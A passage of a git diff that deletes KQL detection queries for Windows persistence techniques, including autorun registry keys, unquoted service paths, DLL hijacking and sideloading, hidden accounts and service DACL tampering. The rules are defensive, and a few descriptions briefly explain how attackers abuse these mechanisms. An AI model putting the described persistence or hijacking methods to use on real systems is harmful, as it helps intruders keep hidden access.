-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\Shellex\\ColumnHandlers" or RegistryKey contains "\\Filter" or RegistryKey contains "\\Exefile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\.exe" or RegistryKey contains "\\.cmd" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers")) and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or RegistryValueData =~ "(Empty)" or RegistryValueData =~ "{807583E5-5146-11D5-A672-00B0D022E945}" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and RegistryKey contains "\\lnkfile\\shellex\\ContextMenuHandlers"))))
\ No newline at end of file
diff --git a/Persistence/Common_Autorun_Keys_Modification.kql b/Persistence/Common_Autorun_Keys_Modification.kql
deleted file mode 100644
index de1f0fb4..00000000
--- a/Persistence/Common_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart" or RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect" or RegistryKey contains "\\SYSTEM\\Setup\\CmdLine" or RegistryKey contains "\\Software\\Microsoft\\Ctf\\LangBarAddin" or RegistryKey contains "\\Software\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Handler" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Filter" or RegistryKey contains "\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Environment\\UserInitMprLogonScript" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Internet Explorer\\Desktop\\Components" or RegistryKey contains "\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32" or RegistryKey contains "\\Control Panel\\Desktop\\Scrnsave.exe") and (not((RegistryKey contains "\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4383}" or RegistryKey contains 
"\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{8A69D345-D564-463c-AFF1-A69D9E530F96}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}" or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\poqexec.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) or ((RegistryKey contains "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Classes\\PROTOCOLS\\Handler" or RegistryKey contains "\\ClickToRunStore\\HKMU\\SOFTWARE\\Classes\\PROTOCOLS\\Handler") or (RegistryValueData in~ ("{314111c7-a502-11d2-bbca-00c04f8ec294}", "{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}", "{42089D2D-912D-4018-9087-2B87803E93FB}", "{5504BE45-A83B-4808-900A-3A5C36E7F77A}", "{807583E5-5146-11D5-A672-00B0D022E945}"))) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")))))
\ No newline at end of file
diff --git a/Persistence/Control_Panel_Items.kql b/Persistence/Control_Panel_Items.kql
deleted file mode 100644
index de98b896..00000000
--- a/Persistence/Control_Panel_Items.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
-// Date: 2020/06/22
-// Level: high
-// Description: Detects the malicious use of a control panel item
-// Tags: attack.execution, attack.defense_evasion, attack.t1218.002, attack.persistence, attack.t1546
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|")))))
\ No newline at end of file
diff --git a/Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql b/Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql
deleted file mode 100644
index 9ec0a25c..00000000
--- a/Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: high
-// Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.
-Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
-
-// Tags: attack.persistence, attack.t1547.009
-DeviceFileEvents
-| where FolderPath =~ "C:\\program.exe"
\ No newline at end of file
diff --git a/Persistence/Creation_Of_Non-Existent_System_DLL.kql b/Persistence/Creation_Of_Non-Existent_System_DLL.kql
deleted file mode 100644
index 973ed62c..00000000
--- a/Persistence/Creation_Of_Non-Existent_System_DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
-// Date: 2022/12/01
-// Level: medium
-// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
-Usually this technique is used to achieve DLL hijacking.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
diff --git a/Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql b/Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql
deleted file mode 100644
index b8dc45ff..00000000
--- a/Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/05/03
-// Level: high
-// Description: Sysmon registry detection of a local hidden user account.
-// Tags: attack.persistence, attack.t1136.001
-DeviceRegistryEvents
-| where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey contains "\\SAM\\SAM\\Domains\\Account\\Users\\Names" and RegistryKey endswith "$"
\ No newline at end of file
diff --git a/Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql b/Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql
deleted file mode 100644
index f9303a14..00000000
--- a/Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/09
-// Level: high
-// Description: Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking
-// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysWOW64\\" or FolderPath contains "\\WinSxS\\")))
\ No newline at end of file
diff --git a/Persistence/CurrentControlSet_Autorun_Keys_Modification.kql b/Persistence/CurrentControlSet_Autorun_Keys_Modification.kql
deleted file mode 100644
index 47714943..00000000
--- a/Persistence/CurrentControlSet_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control" and (RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\Terminal Server\\Wds\\rdpwd\\StartupPrograms" or RegistryKey contains "\\SecurityProviders\\SecurityProviders" or RegistryKey contains "\\SafeBoot\\AlternateShell" or RegistryKey contains "\\Print\\Providers" or RegistryKey contains "\\Print\\Monitors" or RegistryKey contains "\\NetworkProvider\\Order" or RegistryKey contains "\\Lsa\\Notification Packages" or RegistryKey contains "\\Lsa\\Authentication Packages" or RegistryKey contains "\\BootVerificationProgram\\ImagePath")) and (not((((RegistryValueData in~ ("cpwmon64_v40.dll", "CutePDF Writer")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Print\\Monitors\\CutePDF Writer Monitor") or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey endswith "\\NetworkProvider\\Order\\ProviderOrder") or (RegistryValueData =~ "VNCpm.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey endswith "\\Print\\Monitors\\MONVNC\\Driver"))))
\ No newline at end of file
diff --git a/Persistence/CurrentVersion_Autorun_Keys_Modification.kql b/Persistence/CurrentVersion_Autorun_Keys_Modification.kql
deleted file mode 100644
index d035ba97..00000000
--- a/Persistence/CurrentVersion_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey contains "\\Run" or RegistryKey contains "\\RunOnce" or RegistryKey contains "\\RunOnceEx" or RegistryKey contains "\\RunServices" or RegistryKey contains "\\RunServicesOnce" or RegistryKey contains "\\Policies\\System\\Shell" or RegistryKey contains "\\Policies\\Explorer\\Run" or RegistryKey contains "\\Group Policy\\Scripts\\Startup" or RegistryKey contains "\\Group Policy\\Scripts\\Shutdown" or RegistryKey contains "\\Group Policy\\Scripts\\Logon" or RegistryKey contains "\\Group Policy\\Scripts\\Logoff" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects" or RegistryKey contains "\\Authentication\\PLAP Providers" or RegistryKey contains "\\Authentication\\Credential Providers" or RegistryKey contains "\\Authentication\\Credential Provider Filters")) and (not((((RegistryValueData in~ ("\"C:\\Program Files\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath startswith "C:\\Program Files\\AVG\\Antivirus\\Setup\\") or (RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\NgcFirst\\ConsecutiveSwitchCount" or (InitiatingProcessFolderPath endswith 
"\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\WebEx\\WebexHost.exe") or (InitiatingProcessFolderPath in~ ("C:\\WINDOWS\\system32\\devicecensus.exe", "C:\\Windows\\system32\\winsat.exe", "C:\\Program Files\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe", "C:\\Program Files\\Everything\\Everything.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (RegistryValueData =~ "C:\\Program Files\\Aurora-Agent\\tools\\aurora-dashboard.exe" and (InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\aurora-dashboard") or (RegistryValueData =~ "ctfmon.exe /n" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\userinit.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe" or (RegistryValueData endswith "A251-47B7-93E1-CDD82E34AF8B}" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\regsvr32.exe" and RegistryKey contains "DropboxExt") or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe") or (RegistryValueData endswith "\\Everything\\Everything.exe\" -startup" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\Everything") or (RegistryValueData contains "\\GoogleDriveFS.exe" and RegistryValueData startswith 
"C:\\Program Files\\Google\\Drive File Stream\\" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS") or ((RegistryValueData in~ ("{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}", "{A8E52322-8734-481D-A7E2-27B309EF8D56}", "{C973DA94-CBDF-4E77-81D1-E5B794FBD146}", "{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}")) and RegistryKey contains "GoogleDrive") or (RegistryValueData =~ "C:\\Program Files\\Greenshot\\Greenshot.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot") or (RegistryValueData =~ "\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iTunesHelper") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\LogonUI.exe" and (RegistryKey contains "\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}" or RegistryKey contains "\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}" or RegistryKey contains "\\Authentication\\Credential Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}" or RegistryKey contains "\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and (RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \"C:\\Users\\" or RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\")) or (RegistryValueData =~ "C:\\Program Files\\Opera\\assistant\\browser_assistant.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant") or ((RegistryValueData contains 
"\\AppData\\Local\\Package Cache\\{" and RegistryValueData contains "}\\python-") and RegistryValueData endswith ".exe\" /burn.runonce" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{") or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart " and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe") or (RegistryValueData =~ "\"C:\\Program Files\\Zoom\\bin\\installer.exe\" /repair" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zoommsirepair")))) \ No newline at end of file diff --git a/Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql b/Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql deleted file mode 100644 index 93060f91..00000000 --- a/Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" and (RegistryKey contains "\\Winlogon\\VmApplet" or RegistryKey contains "\\Winlogon\\Userinit" or RegistryKey contains "\\Winlogon\\Taskman" or RegistryKey contains "\\Winlogon\\Shell" or RegistryKey contains "\\Winlogon\\GpExtensions" or RegistryKey contains "\\Winlogon\\AppSetup" or RegistryKey contains "\\Winlogon\\AlternateShells\\AvailableShells" or RegistryKey contains "\\Windows\\IconServiceLib" or RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Font Drivers" or RegistryKey contains "\\Drivers32" or RegistryKey contains "\\Windows\\Run" or RegistryKey contains "\\Windows\\Load") and (not(((InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdate.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Temp\\") or RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Image File Execution Options" and (RegistryKey endswith "\\DisableExceptionChainValidation" or RegistryKey endswith "\\MitigationOptions")) or ((RegistryKey contains "\\ClickToRunStore\\HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or RegistryKey contains "\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith 
"C:\\Windows\\Microsoft.NET\\Framework") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" and RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary") or ((RegistryValueData in~ ("DWORD (0x00000009)", "DWORD (0x000003c0)")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\PreviousPolicyAreas" or RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\MaxNoGPOListChangesInterval"))))) \ No newline at end of file diff --git a/Persistence/DLL_Load_via_LSASS.kql b/Persistence/DLL_Load_via_LSASS.kql deleted file mode 100644 index 0cc97026..00000000 --- a/Persistence/DLL_Load_via_LSASS.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/16
-// Level: high
-// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key
-// Tags: attack.execution, attack.persistence, attack.t1547.008
-DeviceRegistryEvents
-| where (RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt" or RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") and (not(((RegistryValueData in~ ("%%systemroot%%\\system32\\ntdsa.dll", "%%systemroot%%\\system32\\lsadb.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe")))
\ No newline at end of file
diff --git a/Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql b/Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
deleted file mode 100644
index 056a9e92..00000000
--- a/Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/07/30
-// Level: high
-// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
-but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\")
\ No newline at end of file
diff --git a/Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql b/Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
deleted file mode 100644
index 29170ff9..00000000
--- a/Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/01
-// Level: high
-// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellChromeAPI.dll"
\ No newline at end of file
diff --git a/Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql b/Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql
deleted file mode 100644
index a620c15a..00000000
--- a/Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: high
-// Description: Detects changes to the default RDP port.
-Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.
-Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
-
-// Tags: attack.persistence, attack.t1547.010
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber" and (not(RegistryValueData =~ "DWORD (0x00000d3d)"))
\ No newline at end of file
diff --git a/Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index 1a09cc4b..00000000
--- a/Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonhnathan Ribeiro, oscd.community
-// Date: 2020/10/16
-// Level: high
-// Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.
-// Tags: attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "D;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")
\ No newline at end of file
diff --git a/Persistence/Direct_Autorun_Keys_Modification.kql b/Persistence/Direct_Autorun_Keys_Modification.kql
deleted file mode 100644
index e8025ca6..00000000
--- a/Persistence/Direct_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.
-// Tags: attack.persistence, attack.t1547.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" or ProcessCommandLine contains "\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell")
\ No newline at end of file
diff --git a/Persistence/Enable_Local_Manifest_Installation_With_Winget.kql b/Persistence/Enable_Local_Manifest_Installation_With_Winget.kql
deleted file mode 100644
index d6abdc89..00000000
--- a/Persistence/Enable_Local_Manifest_Installation_With_Winget.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles"
\ No newline at end of file
diff --git a/Persistence/Enabling_COR_Profiler_Environment_Variables.kql b/Persistence/Enabling_COR_Profiler_Environment_Variables.kql
deleted file mode 100644
index 37c43d0b..00000000
--- a/Persistence/Enabling_COR_Profiler_Environment_Variables.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
-// Date: 2020/09/10
-// Level: medium
-// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.012
-DeviceRegistryEvents
-| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH"
\ No newline at end of file
diff --git a/Persistence/Fax_Service_DLL_Search_Order_Hijack.kql b/Persistence/Fax_Service_DLL_Search_Order_Hijack.kql
deleted file mode 100644
